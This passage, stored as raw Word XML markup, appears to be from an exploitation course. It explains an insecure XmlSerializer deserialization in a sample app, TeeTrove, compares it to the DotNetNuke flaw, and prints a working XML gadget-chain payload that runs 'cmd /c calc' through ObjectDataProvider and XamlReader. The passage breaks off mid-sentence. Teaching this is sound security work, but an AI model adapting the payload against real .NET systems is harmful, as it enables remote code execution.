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41EDD07" wp14:paraId="7A4FFE99" wp14:textId="481206AB">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="322" w:afterAutospacing="off"/>
      </w:pPr>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Example 2: XML</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="641EDD07" wp14:paraId="012D359C" wp14:textId="55B3B812">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="299" w:beforeAutospacing="off" w:after="299" w:afterAutospacing="off"/>
      </w:pPr>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Discovering the Vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="641EDD07" wp14:paraId="57993B83" wp14:textId="0CB122E5">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
      </w:pPr>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Let's look at another possibly vulnerable deserialization in TeeTrove, this time in the Import method, located in Controllers.TeeController.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="641EDD07" wp14:paraId="4E7D794C" wp14:textId="77D5142C">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" wp14:editId="3C539D93" wp14:anchorId="7A281E2D">
            <wp:extent cx="5724524" cy="2676525"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="902395871" name="" descr="image" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R9220d61ab451440f">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p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="641EDD07" wp14:paraId="57C35290" wp14:textId="77EF27C9">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
      </w:pPr>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">Looking through the </w:t>
      </w:r>
      <w:hyperlink r:id="R89d01fa4d497430a">
        <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>Microsoft documentation</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> there are no notices about possible security issues when using XmlSerializer, only this one paragraph which mentions untrusted types should not be serialized.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="641EDD07" wp14:paraId="0A4195B1" wp14:textId="44FB3A6E">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" wp14:editId="268AC0B3" wp14:anchorId="1A5D5A6D">
            <wp:extent cx="5724524" cy="1314450"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1994002165" name="" descr="image" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R1147c0214b2b4ad8">
                      <a:extLst>
                        <a:ext xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5724524" cy="1314450"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="641EDD07" wp14:paraId="0743C92F" wp14:textId="7F3BBD6F">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
      </w:pPr>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Looking at the source code of the website, the expected type is clearly TeeTrove.Models.Tee, however, we should notice that this class name is under our control as it is sent during the request.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="641EDD07" wp14:paraId="26DF3C9E" wp14:textId="49660B18">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" wp14:editId="44A3012D" wp14:anchorId="4C35D89F">
            <wp:extent cx="5724524" cy="3333750"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1263766001" name="" descr="image" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R1b78e209558e4357">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xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="641EDD07" wp14:paraId="2DB77384" wp14:textId="06F8FD7A">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
      </w:pPr>
      <w:hyperlink r:id="R9e7d9d96cb7b4702">
        <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>DotNetNuke</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">, a popular .NET CMS, was </w:t>
      </w:r>
      <w:hyperlink r:id="Ref9bcd05ea564003">
        <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>vulnerable</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> to a deserialization attack in a very similar manner a few years ago (refer to the </w:t>
      </w:r>
      <w:hyperlink w:anchor="L155" r:id="R9c359b7c9ce44942">
        <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>screenshot</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> below). Essentially, if an attacker can control the type with which the XmlSerializer is initialized, then the deserialization is susceptible to exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="641EDD07" wp14:paraId="14A80408" wp14:textId="0CBE4DB1">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" wp14:editId="1B359462" wp14:anchorId="332FA9AB">
            <wp:extent cx="5724524" cy="4124325"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1172360618" name="" descr="image" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="Rab555b66b32f45df">
                      <a:extLst>
                        <a:ext xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5724524" cy="4124325"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="641EDD07" wp14:paraId="2325BAE5" wp14:textId="533A074F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="299" w:beforeAutospacing="off" w:after="299" w:afterAutospacing="off"/>
      </w:pPr>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Developing the Exploit</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="641EDD07" wp14:paraId="10A29415" wp14:textId="66CA82AE">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:before="319" w:beforeAutospacing="off" w:after="319" w:afterAutospacing="off"/>
      </w:pPr>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Taking a Look at the DNN Payload</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="641EDD07" wp14:paraId="063D5D08" wp14:textId="34242D78">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
      </w:pPr>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">At this point, based on the previous section, we might assume that developing the exploit is as simple as serializing an ObjectDataProvider once again to get command execution, but unfortunately it is not as straightforward this time. Reading further through the </w:t>
      </w:r>
      <w:hyperlink r:id="R8b6a13721813476d">
        <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>blog post</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> detailing the similar DotNetNuke deserialization vulnerability, we notice that the while the XML payload does contain an ObjectDataProvider, it is wrapped inside an ExpandedWrapperOfXamlReaderObjectDataProvider tag.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="641EDD07" wp14:paraId="1E1DEE78" wp14:textId="73D53853">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
      </w:pPr>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Code: xml</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="641EDD07" wp14:paraId="604CDC16" wp14:textId="6B3C4132">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>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&lt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>&lt;key="pentest-tools.com" type="System.Data.Services.Internal.ExpandedWrapper`2[[System.Web.UI.ObjectStateFormatter, System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;ExpandedWrapperOfXamlReaderObjectDataProvider&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;ExpandedElement/&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;MethodName&gt;Parse&lt;/MethodName&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;anyType xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xsi:type="xsd:string"&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;ResourceDictionary xmlns='http://schemas.microsoft.com/winfx/2006/xaml/presentation' xmlns:x='http://schemas.microsoft.com/winfx/2006/xaml' xmlns:System='clr-namespace:System;assembly=mscorlib' xmlns:Diag='clr-namespace:System.Diagnostics;assembly=system'&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;ObjectDataProvider x:Key='LaunchCmd' ObjectType='{x:Type Diag:Process}' MethodName='Start'&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">                &lt;ObjectDataProvider.MethodParameters&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">                    &lt;System:String&gt;cmd&lt;/System:String&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">                    &lt;System:String&gt;/c calc&lt;/System:String&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">                &lt;/ObjectDataProvider.MethodParameters&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;/ObjectDataProvider&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;/ResourceDictionary&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;/anyType&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>&lt;/MethodParameters&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>&lt;ObjectInstance xsi:type="XamlReader"&gt;&lt;/ObjectInstance&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>&lt;/ProjectedProperty0&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>&lt;/ExpandedWrapperOfXamlReaderObjectDataProvider&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>&lt;/item&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>&lt;/profile&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" wp14:paraId="220D8ACE" wp14:textId="45A1904E">
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">Before we start blindly copying and pasting anything, let's try to understand what is going on here. After some searching online, we found the following slide from the </w:t>
      </w:r>
      <w:hyperlink r:id="Rc644751488624bee">
        <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>Friday the 13th JSON Attacks</w:t>
        </w:r>
      </w:hyperlink>
